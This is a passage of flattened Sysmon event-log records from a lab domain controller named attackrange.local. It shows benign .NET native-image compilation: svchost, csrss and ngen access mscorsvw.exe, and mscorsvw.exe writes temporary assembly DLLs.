13:45:58.094{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.078{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.078{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.047{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8401-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.031{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bd4-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-01-18 13:45:58.031 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.813{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.813{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.813{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9501-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.766{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9401-00000000A301}4512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.703{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9301-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9201-00000000A301}1264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.250{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.250{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9101-00000000A301}4540C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.234{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6d8-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-18 13:45:59.234 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.203{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.188{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.188{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-9001-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsof